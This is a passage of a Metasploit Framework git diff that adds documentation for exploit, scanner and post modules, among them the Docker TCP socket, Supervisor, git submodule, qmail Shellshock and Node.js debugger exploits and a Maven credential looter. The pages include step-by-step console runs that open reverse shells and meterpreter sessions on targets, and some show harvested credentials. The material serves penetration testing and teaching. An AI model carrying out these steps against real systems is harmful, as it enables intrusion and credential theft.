auxiliary(smb1) > set RHOSTS x.x.x.x +RHOSTS => x.x.x.x +msf auxiliary(smb1) > run + +[+] x.x.x.x:445 - x.x.x.x supports SMBv1 dialect. +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +msf auxiliary(smb1) > services -S x.x.x.x + +Services +======== + +host port proto name state info +---- ---- ----- ---- ----- ---- +x.x.x.x 445 tcp smb1 open +``` + +#### A host that does not support SMBv1 + +``` +msf auxiliary(smb1) > use auxiliary/scanner/smb/smb1 +msf auxiliary(smb1) > set RHOSTS y.y.y.y +RHOSTS => y.y.y.y +msf auxiliary(smb1) > run + +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +``` +___ + + +## Options + +The only option is RHOSTS, which can be specified as a single IP, hostname, or an IP range in CIDR notation or range notation. It can also be set using hosts from the database using ```hosts -R```. \ No newline at end of file diff --git a/documentation/modules/auxiliary/scanner/ssh/ssh_login.md b/documentation/modules/auxiliary/scanner/ssh/ssh_login.md index 1a1be86f02..e50c0ff6bd 100644 --- a/documentation/modules/auxiliary/scanner/ssh/ssh_login.md +++ b/documentation/modules/auxiliary/scanner/ssh/ssh_login.md @@ -14,7 +14,7 @@ 5. Do: `run` 6. You will hopefully see something similar to, followed by a session: - ````[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '``` + ```[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '``` ## Options diff --git a/documentation/modules/exploit/linux/http/centreon_useralias_exec.md b/documentation/modules/exploit/linux/http/centreon_useralias_exec.md index f9452ae0cd..9ac31d1ccc 100644 --- a/documentation/modules/exploit/linux/http/centreon_useralias_exec.md +++ b/documentation/modules/exploit/linux/http/centreon_useralias_exec.md @@ -187,7 +187,7 @@ finish ## Scenarios Just a standard run. - +``` msf > use exploit/linux/http/centreon_useralias_exec msf exploit(centreon_useralias_exec) > set payload cmd/unix/reverse_python payload => cmd/unix/reverse_python diff --git a/documentation/modules/exploit/linux/http/denyall_waf_exec.md b/documentation/modules/exploit/linux/http/denyall_waf_exec.md new file mode 100644 index 0000000000..c41efa6ae1 --- /dev/null +++ b/documentation/modules/exploit/linux/http/denyall_waf_exec.md @@ -0,0 +1,47 @@ +## Vulnerable Application + +This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a terminal command under the context of the web server user. + +It's possible to have trial demo for 15 days at Amazon Marketplace. +[https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911](https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911) + +You just need to follow instruction above URL. + +## Verification Steps + +A successful check of the exploit will look like this: + +- [ ] Start `msfconsole` +- [ ] `use use exploit/linux/http/denyall_exec` +- [ ] Set `RHOST` +- [ ] Set `LHOST` +- [ ] Run `check` +- [ ] **Verify** that you are seeing `The target appears to be vulnerable.` +- [ ] Run `exploit` +- [ ] **Verify** that you are seeing `iToken` value extraction. +- [ ] **Verify** that you are getting `meterpreter` session. + +## Scenarios + +``` +msf > use exploit/linux/http/denyall_exec +msf exploit(denyall_exec) > +msf exploit(denyall_exec) > set RHOST 35.176.123.128 +RHOST => 35.176.123.128 +msf exploit(denyall_exec) > set LHOST 35.12.3.3 +LHOST => 35.12.3.3 +msf exploit(denyall_exec) > check +[*] 35.176.123.128:3001 The target appears to be vulnerable. +msf exploit(denyall_exec) > exploit + +[*] Started reverse TCP handler on 35.12.3.3:4444 +[*] Extracting iToken value from unauthenticated accessible endpoint. +[+] Awesome. iToken value = n84b214ad1f53df0bd6ffa3dcfe8059a +[*] Trigerring command injection vulnerability with iToken value. +[*] Sending stage (40411 bytes) to 35.176.123.128 +[*] Meterpreter session 1 opened (35.176.123.128:4444 -> 35.12.3.3:60556) at 2017-09-19 14:31:52 +0300 + +meterpreter > pwd +/var/log/denyall/reverseproxy +meterpreter > +``` \ No newline at end of file diff --git a/documentation/modules/exploit/linux/http/docker_daemon_tcp.md b/documentation/modules/exploit/linux/http/docker_daemon_tcp.md new file mode 100644 index 0000000000..4c32e54a03 --- /dev/null +++ b/documentation/modules/exploit/linux/http/docker_daemon_tcp.md @@ -0,0 +1,131 @@ +# Vulnerable Application +Utilizing Docker via unprotected tcp socket (2375/tcp, maybe 2376/tcp +with tls but without tls-auth), an attacker can create a Docker +container with the '/' path mounted with read/write permissions on the +host server that is running the Docker container. As the Docker +container executes command as uid 0 it is honored by the host operating +system allowing the attacker to edit/create files owned by root. This +exploit abuses this to creates a cron job in the '/etc/cron.d/' path of +the host server. + +The Docker image should exist on the target system or be a valid image +from hub.docker.com. + +## Docker Engine +By default, Docker runs via a non-networked unix socket. It can also +optionally communicate using a tcp socket. + +> Warning: Changing the default docker daemon binding to a TCP port or +Unix docker user group will increase your security risks by allowing +non-root users to gain root access on the host. Make sure you control +access to docker. If you are binding to a TCP port, anyone with access +to that port has full Docker access; so it is not advisable on an open +network. -- [from docs.docker.com][1] + +This module was tested with Debian 9 and CentOS 7 as the host operating +system and with Docker CE 17.06.0-ce and Docker Engine 1.13.1. + +### Install Debian 9 +First [install Debian 9][2] with default task selection. This includes +the "*standard system utilities*". + +### Install Docker +Then install a supported version of [Docker on Debian system][3]. + +```bash +# TL;DR +apt-get remove docker docker-engine +apt-get install apt-transport-https ca-certificates curl gnupg2 software-properties-common +curl -fsSL https://download.docker.com/linux/debian/gpg | apt-key add - +apt-key fingerprint 0EBFCD88 +# Verify that the key ID is 9DC8 5822 9FC7 DD38 854A E2D8 8D81 803C 0EBF CD88. +add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/debian $(lsb_release -cs) stable" +apt-get update +apt-get install docker-ce +docker run hello-world +``` + +### Activate unprotected tcp socket +Once Docker is installed, customize the Docker daemon options and add +the tcp socket `-H tcp://0.0.0.0:2375` option. On Debian override the +settings from `/lib/systemd/system/docker.service` with a new file +`/etc/systemd/system/docker.service`. + +Further information: [docker systemd][4] and [docker daemon options][5]. + +```bash +# TL;DR +echo "[Service] +ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375" | tee /etc/systemd/system/docker.service +systemctl daemon-reload +systemctl restart docker +curl http://127.0.0.1:2375/_ping ; echo +OK +``` + +### Mitigation + +[Disable][5] or [protect][6] the Docker tcp socket. + +# Exploitation +This module is designed for the attacker to leverage, creation of a +Docker container with out authentication through the Docker tcp socket +to gain root access to the hosting server of the Docker container. + +## Options +- DOCKERIMAGE is the locally or from hub.docker.com available image you are wanting to have Docker to deploy for this exploit. +- CONTAINER_ID if you want to have a human readable name for your container, else it will be randomly generated + +## Steps to exploit with module +- [ ] Start msfconsole +- [ ] use exploit/linux/http/docker_daemon_tcp +- [ ] Set the options appropriately and set VERBOSE to true +- [ ] Verify it creates a Docker container and it successfully runs +- [ ] After a minute a session should be opened from the Docker server + +## Example Output +``` +msf > use exploit/linux/http/docker_daemon_tcp +msf exploit(docker_daemon_tcp) > set RHOST 192.168.66.23 +RHOST => 192.168.66.23 +msf exploit(docker_daemon_tcp) > set PAYLOAD python/meterpreter/reverse_tcp +PAYLOAD => python/meterpreter/reverse_tcp +msf exploit(docker_daemon_tcp) > set LHOST 192.168.66.10 +LHOST => 192.168.66.10 +msf exploit(docker_daemon_tcp) > set VERBOSE true +VERBOSE => true +msf exploit(docker_daemon_tcp) > check +[+] 192.168.66.23:2375 The target is vulnerable. +msf exploit(docker_daemon_tcp) > run + +[*] Started reverse TCP handler on 192.168.66.10:4444 +[*] Check if images exist on the target host +[*] Image is not available on the target host +[*] Trying to pulling image from docker registry, this may take a while +[*] Setting container json request variables +[*] Creating the docker container command +[*] The docker container is created, waiting for deploy +[*] Waiting for the cron job to run, can take up to 60 seconds +[*] Waiting until the docker container stopped +[*] The docker container has been stopped, now trying to remove it +[*] Sending stage (40411 bytes) to 192.168.66.23 +[*] Meterpreter session 1 opened (192.168.66.10:4444 -> 192.168.66.23:35050) at 2017-07-25 14:03:02 +0200 +[+] Deleted /etc/cron.d/lVoepNpy +[+] Deleted /tmp/poasDIuZ + + +meterpreter > sysinfo +Computer : debian +OS : Linux 4.9.0-3-amd64 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26) +Architecture : x64 +System Language : en_US +Meterpreter : python/linux +meterpreter > +``` + +[1]:https://docs.docker.com/engine/reference/commandline/dockerd/#bind-docker-to-another-hostport-or-a-unix-socket +[2]:https://www.debian.org/releases/stretch/amd64/index.html.en +[3]:https://docs.docker.com/engine/installation/linux/docker-ce/debian/ +[4]:https://docs.docker.com/engine/admin/systemd/ +[5]:https://docs.docker.com/engine/reference/commandline/dockerd/#options +[6]:https://docs.docker.com/engine/security/https/ diff --git a/documentation/modules/exploit/linux/http/logsign_exec.md b/documentation/modules/exploit/linux/http/logsign_exec.md index c875dd0347..177a36b5bb 100644 --- a/documentation/modules/exploit/linux/http/logsign_exec.md +++ b/documentation/modules/exploit/linux/http/logsign_exec.md @@ -56,7 +56,7 @@ dns-nameservers 8.8.8.8 1. Install the software as documented above 2. Start `msfconsole` 3. `use exploit/linux/http/logsign_exec` - 4. `set rhost 12.0.0.10 + 4. `set rhost 12.0.0.10` 6. `python/meterpreter/reverse_tcp` is configured as a default payload. Change it if you need. Most of the case, you're okay go with default payload type. 7. `set LHOST 12.0.0.1` 8. `check` and validate that you are seeing following output. diff --git a/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md b/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md new file mode 100644 index 0000000000..8b63cf55ec --- /dev/null +++ b/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md @@ -0,0 +1,78 @@ +## Vulnerable Application + + This module exploits an authenticated RCE vulnerability in Supervisor versions 3.0a1 to 3.3.2 + + This has been tested with versions 3.2.0 and 3.3.2 + +### Creating A Testing Environment + + At the time of writing, version 3.2.0-2ubuntu0.1 is available in the Ubuntu repositories. + + 1. ```sudo apt-get install supervisor``` + 2. Enable Web interface/XML-RPC server in Supervisor config in `/etc/supervisor/supervisord.conf` + + ``` + [inet_http_server] ; inet (TCP) server disabled by default + port=:9001 ; ip_address:port specifier, *:port for all iface + username=user ; default is no username (open server) + password=123 ; default is no password (open server) + ``` + + 3. Restart the service: `sudo service supervisor restart` + +## Verification Steps + + 1. ```use exploit/linux/http/supervisor_xmlrpc_exec``` + 2. ```set lhost [IP]``` + 3. ```set rhost [IP]``` + 4. ```set httpusername user``` + 5. ```set httppassword 123``` + 6. ```exploit``` + 7. A meterpreter session should have been opened successfully + +## Options + + **HttpUsername** + + Username for HTTP basic auth which is set in the conf file(optional) + + **HttpPassword** + + Password for HTTP basic auth which is set in the conf file(optional) + + **TARGETURI** + + The path to the XML-RPC endpoint + +## Scenarios + +### Supervisor 3.2.0 on Xubuntu 16.04 + +``` +msf > use exploit/linux/http/supervisor_xmlrpc_exec +msf exploit(supervisor_xmlrpc_exec) > set httpusername user +httpusername => user +msf exploit(supervisor_xmlrpc_exec) > set httppassword 123 +httppassword => 123 +msf exploit(supervisor_xmlrpc_exec) > set lhost 192.168.0.2 +lhost => 192.168.0.2 +msf exploit(supervisor_xmlrpc_exec) > set rhost 192.168.0.19 +rhost => 192.168.0.19 +msf exploit(supervisor_xmlrpc_exec) > check + +[*] Extracting version from web interface.. +[*] Using basic auth (user:123) +[+] Vulnerable version found: 3.2.0 +[*] 192.168.0.19:9001 The target appears to be vulnerable. +msf exploit(supervisor_xmlrpc_exec) > exploit + +[*] Started reverse TCP handler on 192.168.0.2:4444 +[*] Sending XML-RPC payload via POST to 192.168.0.19:9001/RPC2 +[*] Using basic auth (user:123) +[*] Sending stage (2878872 bytes) to 192.168.0.19 +[*] Command Stager progress - 100.00% done (782/782 bytes) +[+] Request timeout, usually indicates success. Passing to handler.. +[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.19:36186) at 2017-08-30 01:24:45 +0100 + +meterpreter > +``` diff --git a/documentation/modules/exploit/multi/http/git_submodule_command_exec.md b/documentation/modules/exploit/multi/http/git_submodule_command_exec.md new file mode 100644 index 0000000000..bb119f36cb --- /dev/null +++ b/documentation/modules/exploit/multi/http/git_submodule_command_exec.md @@ -0,0 +1,62 @@ +## Vulnerable Application + + Git can be installed on a variety of operating systems, however + newer versions may contain the patch for this vulnerability. + + On OSX it can be installed with the XCode command line tools: + ```xcode-select --install``` + + On Linux it can be installed with apt: + ```sudo apt-get update && sudo apt-get install git``` + + You can check the version with ```git --version```. + The fix is included in the following version: + 2.7.6, 2.8.6, 2.9.5, 2.10.4, 2.11.3, 2.12.4, 2.13.5, 2.14.1 + +## Verification Steps + + Example steps in this format: + + 1. Install the application + 1. Start msfconsole + 1. Do: ```use exploit/multi/http/git_submodule_command_exec``` + 1. Do: ```set SRVHOST [local host]``` + 1. Do: ```set LHOST [local host]``` + 1. Do: ```exploit``` + 1. Clone the malicious Git URI and its submodules + 1. You should get a shell + +## Options + + **GIT_URI** + + This is the URI the git repository will be hosted from (defaults to random). + + **GIT_SUBMODULE** + + This is the URI of the submodule within the git repository (defaults to random). + The url of this submodule, when cloned, will execute the payload. + +## Scenarios + + Example usage against a macOS Sierra x64 bit target running git version 2.10.1 + +``` +msf > use exploit/multi/http/git_submodule_command_exec +msf exploit(git_submodule_command_exec) > set SRVHOST 192.168.0.1 +SRVHOST => 192.168.0.1 +msf exploit(git_submodule_command_exec) > set LHOST 192.168.0.1 +LHOST => 192.168.0.1 +msf exploit(git_submodule_command_exec) > exploit +[*] Exploit running as background job. + +[*] Started reverse TCP handler on 192.168.0.1:4444 +msf exploit(git_submodule_command_exec) > [*] Using URL: http://192.168.0.1:8080/D29MF1UC +[*] Server started. +[*] Malicious Git URI is http://192.168.0.1:8080/ldnwrixuqq.git +*** +Victim executes: git clone http://192.168.0.1:8080/ldnwrixuqq.git --recurse-submodules +*** +[*] Command shell session 1 opened (192.168.0.1:4444 -> 192.168.0.1:55151) at 2017-08-29 16:54:56 +0800 +[*] Command shell session 2 opened (192.168.0.1:4444 -> 192.168.0.1:55152) at 2017-08-29 16:54:56 +0800 +``` diff --git a/documentation/modules/exploit/multi/http/struts2_rest_xstream.md b/documentation/modules/exploit/multi/http/struts2_rest_xstream.md new file mode 100644 index 0000000000..97f7785086 --- /dev/null +++ b/documentation/modules/exploit/multi/http/struts2_rest_xstream.md @@ -0,0 +1,47 @@ +`struts2_rest_xstream` is a module that exploits Apache Struts 2's REST plugin, using the XStream handler to deserialise XML requests perform arbitrary code execution. + +## Vulnerable Application + +Apache Struts versions 2.1.2 - 2.3.33 and Struts 2.5 - Struts 2.5.12 + +You can download these versions here with any version of Apache Tomcat: + +http://archive.apache.org/dist/struts/ + +You will also need to install a Struts 2 showcase application, which can be found here: + +https://mvnrepository.com/artifact/org.apache.struts/struts2-rest-showcase + +## Options + +**TARGETURI** + +The path to a struts application action + +**VHOST** + +The HTTP server virtual host. You will probably need to configure this as well, even though it is set as optional. + +## Demonstration + +**The Check Command** + +The `struts2_rest_xstream` module comes with a check command that can effectively check if the remote host is vulnerable or not. To use this, configure the msfconsole similar to the following: + +``` +set VERBOSE true +set RHOST [IP] +set TARGETURI [path to the Struts app with an action] +``` + +When the module is in verbose mode, the `check` command will try to tell you the OS information, and whether or not the machine is vulnerable. Like this: + +``` +msf exploit(struts2_rest_xstream) > check + +[+] 10.1.11.11:8080 The target appears to be vulnerable. +``` + +**Exploiting the Host** + +After identifying the vulnerability on the target machine, you can try to exploit it. Be sure to set TARGETURI to the correct URI for your application, and the TARGET variable for the appropriate host OS. diff --git a/documentation/modules/exploit/multi/misc/nodejs_v8_debugger.md b/documentation/modules/exploit/multi/misc/nodejs_v8_debugger.md new file mode 100644 index 0000000000..1d699fd6b9 --- /dev/null +++ b/documentation/modules/exploit/multi/misc/nodejs_v8_debugger.md @@ -0,0 +1,64 @@ +## Vulnerable Application + +Current and historical versions of node (or any JS env based on the +V8 JS engine) have this functionality and could be exploitable if +configured to expose the JS port on an untrusted interface. + +Install a version of node using any of the normal methods: +* Vendor: https://nodejs.org/en/download/package-manager/ +* Distro: `sudo apt-get install nodejs` + +Alternately, use standard node docker containers as targets: +``` +$ docker run -it --rm -p 5858:5858 node:4-wheezy node --debug=0.0.0.0:5858 +``` +(Others at https://hub.docker.com/_/node/) + +Tested on Node 7.x, 6.x, 4.x + +## Verification Steps + +1. Run a node process exposing the debug port +``` +node --debug=0.0.0.0:5858 +``` + +2. Exploit it and catch the callback: + +``` +msfconsole -x "use exploit/multi/misc/nodejs_v8_debugger; set RHOST 127.0.0.1; set PAYLOAD nodejs/shell_reverse_tcp; set LHOST 127.0.0.1; handler -H 0.0.0.0 -P 4444 -p nodejs/shell_reverse_tcp; exploit +``` +(If using docker hosts as targets for testing, ensure that LHOST addr is accessible to the container) + +Note that in older Node versions (notably 4.8.4), the debugger will not immediately process the incoming eval message. As soon as there is some kind of activity +(such as a step or continue in the debugger, or just hitting enter), the payload will execute and the handler session will start. + + +## Scenarios + +### Example Run (Node 7.x) + +Victim: +``` +$ node --version +v7.10.0 +$ node --debug=0.0.0.0:5858 +(node:83089) DeprecationWarning: node --debug is deprecated. Please use node --inspect instead. +Debugger listening on 0.0.0.0:5858 +> +(To exit, press ^C again or type .exit) +``` + +Attacker: +``` +msf exploit(nodejs_v8_debugger) > exploit + +[*] Started reverse TCP handler on 10.0.0.141:4444 +[*] 127.0.0.1:5858 - Sending 745 byte payload... +[*] 127.0.0.1:5858 - Got success response +[*] Command shell session 4 opened (10.0.0.141:4444 -> 10.0.0.141:53168) at 2017-09-04 00:37:17 -0700 + +id +(redacted) +``` + diff --git a/documentation/modules/exploit/unix/smtp/qmail_bash_env_exec.md b/documentation/modules/exploit/unix/smtp/qmail_bash_env_exec.md new file mode 100644 index 0000000000..167ef65cdd --- /dev/null +++ b/documentation/modules/exploit/unix/smtp/qmail_bash_env_exec.md @@ -0,0 +1,82 @@ +## Vulnerable Application + +Any qmail version (works on latest versions, qmail-1.03 and netqmail-1.06) running on a system with a vulnerable BASH (Shellshock). In order to execute code, /bin/sh has to be linked to bash (usually default configuration) and a valid recipient must be set on the RCPT TO field (usually admin@exampledomain.com). The exploit does not work on the "qmailrocks" community version as it ensures the MAILFROM field is well-formed. + +## Setting up a vulnerable environment + +Install Qmail on a Linux server with a shellshock vulnerable bash. Ensure that /bin/sh is linked to bash. Create an e-mail account on that qmail server. IMPORTANT: there is a community version of qmail, "qmailrocks" (http://qmailrocks.thibs.com/) which apply a patch that checks the vulnerable MAILFROM parameter. This version (with the patch applied) is NOT vulnerable. If you are using this version, change the "int mfcheck()" function on qmail-smtpd.c and ensure it returns always 0 (after applying the patch) and re-compile qmail-smtpd. + +## Verification Steps + + 1. `use exploit/unix/smtp/qmail_bash_env_exec` + 2. `set RHOST ` + 3. `set MAILTO ` + 4. `set payload cmd/unix/reverse` + 5. `set LHOST ` + 7. optionally set `RPORT` and `LPORT` + 8. `exploit` + 9. **Verify** a new shell session is started + +## Options + +**MAILTO** + +A valid e-mail recipient. Usually, admin@targetdomain.com can be used. + +## Sample Output +**Tested on qmail-1.03 on Debian 6.0.6 (squeeze). BASH version 4.1.5(1).** + +``` +msf > use exploit/unix/smtp/qmail_bash_env_exec +msf exploit(qmail_bash_env_exec) > set rhost 192.168.1.113 +rhost => 192.168.1.113 +msf exploit(qmail_bash_env_exec) > set mailto "admin@testqmail2.test" +mailto => admin@testqmail2.test +msf exploit(qmail_bash_env_exec) > set payload cmd/unix/reverse +payload => cmd/unix/reverse +msf exploit(qmail_bash_env_exec) > show options + +Module options (exploit/unix/smtp/qmail_bash_env_exec): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + MAILTO admin@testqmail2.test yes TO address of the e-mail + RHOST 192.168.1.113 yes The target address + RPORT 25 yes The target port (TCP) + + +Payload options (cmd/unix/reverse): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + LHOST 192.168.1.102 yes The listen address + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Automatic + + +msf exploit(qmail_bash_env_exec) > run + +[*] Started reverse TCP double handler on 192.168.1.102:4444 +[*] 192.168.1.113:25 - Sending the payload... +[*] 192.168.1.113:25 - Sending RCPT TO admin@testqmail2.test +[*] Accepted the first client connection... +[*] Accepted the second client connection... +[*] Command: echo RvZfov9i2ZuveLXA; +[*] Writing to socket A +[*] Writing to socket B +[*] Reading from sockets... +[*] Reading from socket B +[*] B: "RvZfov9i2ZuveLXA\r\n" +[*] Matching... +[*] A is input... +[*] Command shell session 19 opened (192.168.1.102:4444 -> 192.168.1.113:48167) at 2017-05-04 15:11:02 +0200 + +whoami +vpopmail +``` diff --git a/documentation/modules/exploit/windows/browser/firefox_smil_uaf.md b/documentation/modules/exploit/windows/browser/firefox_smil_uaf.md index f6e7c223b9..106d1f24a5 100644 --- a/documentation/modules/exploit/windows/browser/firefox_smil_uaf.md +++ b/documentation/modules/exploit/windows/browser/firefox_smil_uaf.md @@ -17,7 +17,7 @@ The module includes an option named UsePostHTML which is turned off by default. 1. Start msfconsole 2. Do: ```use exploit/windows/browser/firefox_smil_uaf``` -3. Do: ```set payload [PREFERRED PAYLOAD] +3. Do: ```set payload [PREFERRED PAYLOAD]``` 4. Do: ```set PAYLOAD [PAYLOAD NAME]``` 5. Set payload options as needed 6. Do: ```run```, and have a target browse to the generated URL diff --git a/documentation/modules/exploit/windows/http/disk_pulse_enterprise_get.md b/documentation/modules/exploit/windows/http/disk_pulse_enterprise_get.md new file mode 100644 index 0000000000..13db863e7d --- /dev/null +++ b/documentation/modules/exploit/windows/http/disk_pulse_enterprise_get.md @@ -0,0 +1,55 @@ +## Vulnerable Application + + Tested on Windows 7 x64 and x86. + + Install the application from the link below and enable the web server by going to Options -> Server -> Enable Web Server on Port. + + [Disk Pulse Enterprise v 9.9.16](https://www.exploit-db.com/apps/45ce22525c87c0762f6e467db6ddfcbc-diskpulseent_setup_v9.9.16.exe) + +## Verification Steps + + 1. Install the application and set the option above to enable the web server + 2. Start msfconsole + 3. Do: ```use exploit/windows/http/disk_pulse_enterprise_get``` + 5. Set options and payload + 6. Do: ```run``` + 7. You should get a shell. + +## Options + + **RHOST** + + IP address of the remote host running the server. + + **RPORT** + + Port that the web server is running on. Default is 80 but it can be changed when setting up the program or in the options. + +## Scenarios + + To obtain a shell: + + ``` +msf > use exploit/windows/http/disk_pulse_enterprise_get +msf exploit(disk_pulse_enterprise_get) > set payload windows/shell_reverse_tcp +payload => windows/shell_reverse_tcp +msf exploit(disk_pulse_enterprise_get) > set RHOST x.x.x.x +RHOST => x.x.x.x +msf exploit(disk_pulse_enterprise_get) > set LHOST y.y.y.y +LHOST => y.y.y.y +msf exploit(disk_pulse_enterprise_get) > set LPORT 1234 +LPORT => 1234 +msf exploit(disk_pulse_enterprise_get) > set RPORT 8080 +RPORT => 8080 +msf exploit(disk_pulse_enterprise_get) > exploit + +[*] Started reverse TCP handler on y.y.y.y:1234 +[*] Generating exploit... +[*] Sending exploit... +[*] Command shell session 1 opened (y.y.y.y:1234 -> x.x.x.x:64567) at 2017-09-14 10:52:06 -0500 + +Microsoft Windows [Version 6.1.7600] +Copyright (c) 2009 Microsoft Corporation. All rights reserved. + +C:\Windows\system32> + ``` \ No newline at end of file diff --git a/documentation/modules/exploit/windows/misc/gh0st.md b/documentation/modules/exploit/windows/misc/gh0st.md new file mode 100644 index 0000000000..5ae7c251e4 --- /dev/null +++ b/documentation/modules/exploit/windows/misc/gh0st.md @@ -0,0 +1,42 @@ +## Vulnerable Application + + This module exploits a buffer overflow in the Gh0st Controller when handling a drive list as received by a victim. + This vulnerability can allow remote code execution in the context of the user who ran it. + + A vulnerable version of the software is available here: [gh0st 3.6](https://github.com/rapid7/metasploit-framework/files/1243297/0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c.zip) + +## Verification Steps + + 1. Run the application + 2. Start msfconsole + 3. Do: `use exploit/windows/misc/gh0st` + 4. Do: `set rhost [ip]` + 5. Do: `exploit` + 6. Get a shell + +## Options + + **MAGIC** + + This is the 5 character magic used by the server. The default is `Gh0st` + +## Scenarios + +### Windows XP SP3 with gh0st 3.6 + +``` +msf > use exploit/windows/misc/gh0st +msf exploit(gh0st) > set rhost 192.168.2.108 +rhost => 192.168.2.108 +msf exploit(gh0st) > exploit + +[*] Started reverse TCP handler on 1.2.3.4:4444 +[*] 1.2.3.1:80 - Trying target Gh0st Beta 3.6 +[*] 1.2.3.1.108:80 - Spraying heap... +[*] 1.2.3.1:80 - Trying command 103... +[*] Sending stage (956991 bytes) to 1.2.3.1 +[*] Meterpreter session 1 opened (1.2.3.4:4444 -> 1.2.3.1:1303) at 2017-08-26 16:53:58 -0400 +[*] 1.2.3.1:80 - Server closed connection + +meterpreter > +``` diff --git a/documentation/modules/exploit/windows/misc/plugx.md b/documentation/modules/exploit/windows/misc/plugx.md new file mode 100644 index 0000000000..63640995f3 --- /dev/null +++ b/documentation/modules/exploit/windows/misc/plugx.md @@ -0,0 +1,42 @@ +## Vulnerable Application + + This module exploits a stack overflow in the Plug-X Controller when handling a larger than expected message. + This vulnerability can allow remote code execution however it causes a popup message to be displayed on the target before execution is gained. + + A vulnerable version of the software is available here: [PlugX type 1](https://github.com/rapid7/metasploit-framework/files/1243293/9f59a606c57217d98a5eea6846c8113aca07b203e0dcf17877b34a8b2308ade6.zip) + +## Verification + + 1. Run the application + 2. Start msfconsole + 3. Do: `use exploit/windows/misc/plugx` + 4. Do: `set rhost [ip]` + 5. Do: `set target [target]` + 6. Do: `exploit` + 7. Click OK for the "PeDecodePacket" pop-up on the target + 8. Get a shell + +## Scenarios + +### Windows XP SP3 with PlugX type 1 + +``` +msf > use exploit/windows/misc/plugx +msf exploit(plugx) > set rhost 1.2.3.4 +rhost => 1.2.3.4 +msf exploit(plugx) > set target 1 +target => 1 +msf exploit(plugx) > set verbose true +verbose => true +msf exploit(plugx) > exploit + +[*] Started reverse TCP handler on 1.2.3.99:4444 +[*] 1.2.3.4:13579 - Trying target PlugX Type I... +[*] 1.2.3.4:13579 - waiting for response +[*] Sending stage (956991 bytes) to 1.2.3.4 +[*] Meterpreter session 1 opened (1.2.3.99:4444 -> 1.2.3.4:1975) at 2017-09-04 19:53:07 -0400 +[*] 1.2.3.4:13579 - Server closed connection + +meterpreter > getuid +Server username: WINXP\user +``` diff --git a/documentation/modules/post/hardware/automotive/getvinfo.md b/documentation/modules/post/hardware/automotive/getvinfo.md index ed9fc984c7..4af4e47892 100644 --- a/documentation/modules/post/hardware/automotive/getvinfo.md +++ b/documentation/modules/post/hardware/automotive/getvinfo.md @@ -30,6 +30,10 @@ PIDs to ASCII. Optional byte-value to use for padding all CAN bus packets to an 8-byte length. Padding is disabled by default. + **FC** + + Optional. If true forces sending flow control packets on all multibyte ISO-TP requests + ## Scenarios Given a standard vehicle ECU that is connected to can2 of the HWBridge device: diff --git a/documentation/modules/post/multi/gather/maven_creds.md b/documentation/modules/post/multi/gather/maven_creds.md new file mode 100644 index 0000000000..3c7235021d --- /dev/null +++ b/documentation/modules/post/multi/gather/maven_creds.md @@ -0,0 +1,64 @@ +## Vulnerable Application + +[Maven](https://maven.apache.org/) a software project management. +This module seeks all settings.xml (Maven configuration file) on the target file system to extract credentials from them. +Credentials are store in the tag ; the module also tries to cross the identifier found with the or + tag in order to find the full realm the credentials belong to. + +This module was successfully tested against: + +- Ubuntu 14.04 and Maven 3.0.5 with shell and meterpreter as session type +- Debian 9 and Maven 3.0.5 with shell and meterpreter as session type + +## Verification Steps + + 1. Get a `shell` or `meterpreter` session on some host. + 2. Do: ```use post/multi/gather/maven_creds``` + 3. Do: ```set SESSION [SESSION_ID]``` + 4. Do: ```run``` + 5. If the system has readable configuration files (settings.xml) containing username and passwords, they will be printed out. + +## Scenarios + +### Ubuntu 14.04 and Maven version 3.0.5 + +``` +msf post(maven_creds) > run + +[*] Finding user directories +[*] Unix OS detected +[*] Looting 19 files +[*] Downloading /home/user/settings.xml +[*] Reading settings.xml file from /home/user/settings.xml +[*] Collected the following credentials: +[*] Id: server-nexus-dev +[*] Username: deploynexus-dev +[*] Password: password-dev +[*] Try to find url from id... +[*] No url found, id will be set as realm + +[*] Collected the following credentials: +[*] Id: server-nexus-int +[*] Username: deploynexus-int +[*] Password: password-int +[*] Try to find url from id... +[*] Found url in mirror : http://www.myhost.com/int + +[*] Collected the following credentials: +[*] Id: server-nexus-prd +[*] Username: deploynexus-prd +[*] Password: password-prd +[*] Try to find url from id... +[*] Found url in repository : http://www.myhost.com/prd + + +msf post(maven_creds) > creds + +Credentials +=========== + +host origin service public private realm private_type +---- ------ ------- ------ ------- ----- ------------ + deploynexus-dev password-dev server-nexus-dev Password + deploynexus-int password-int http://www.myhost.com/int Password + deploynexus-prd password-prd http://www.myhost.com/prd Password \ No newline at end of file diff --git a/external/source/meterpreter/README b/external/source/meterpreter/README index 5fd64608e6..d22b98ad8b 100644 --- a/external/source/meterpreter/README +++ b/external/source/meterpreter/README @@ -1,2 +1,2 @@ -Meterpreter source code has moved to its own repository, hosted at -https://github.com/rapid7/meterpreter +Meterpreter source code is part of the metasploit-payloads repository, hosted at 